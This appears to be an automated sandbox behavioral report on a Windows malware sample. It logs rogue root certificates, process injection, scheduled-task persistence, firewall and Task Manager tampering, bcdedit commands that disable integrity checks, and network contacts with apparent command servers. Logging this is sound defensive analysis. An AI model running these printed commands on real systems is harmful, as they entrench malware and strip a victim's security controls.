Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\runtimenetSvc.exe N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\services.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\6E2E.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\1cf4e57f-32c3-4019-88f0-dbc6891395db" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\84BB.exe

"C:\Users\Admin\AppData\Local\Temp\84BB.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\84BB.exe

"C:\Users\Admin\AppData\Local\Temp\84BB.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1456

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 124

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BD88.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\C851.exe

C:\Users\Admin\AppData\Local\Temp\C851.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240225224649.log C:\Windows\Logs\CBS\CbsPersist_20240225224649.cab

C:\Users\Admin\AppData\Local\Temp\C851.exe

"C:\Users\Admin\AppData\Local\Temp\C851.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\DE51.exe

C:\Users\Admin\AppData\Local\Temp\DE51.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {7FE3199C-699E-4998-9CDF-A768539BA244} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\2F75.exe

C:\Users\Admin\AppData\Local\Temp\2F75.exe

C:\Users\Admin\AppData\Local\Temp\34C3.exe

C:\Users\Admin\AppData\Local\Temp\34C3.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 564

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\containerProviderhost\SSJnjC24t.bat" "

C:\containerProviderhost\runtimenetSvc.exe

"C:\containerProviderhost/runtimenetSvc.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CCTxfaFxh3.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\containerProviderhost\services.exe

"C:\containerProviderhost\services.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 564

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 brusuax.com udp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 api.2ip.ua udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.139.220:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.139.220:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 habrafa.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
AR 190.224.203.37:80 habrafa.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 mahta-netwotk.click udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 trypokemon.com udp
US 104.21.51.193:443 trypokemon.com tcp
US 8.8.8.8:53 loftproper.com udp
US 104.21.11.77:443 loftproper.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 5a371fb2-b800-4e2a-8b52-a44f9fc24242.uuid.createupdate.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
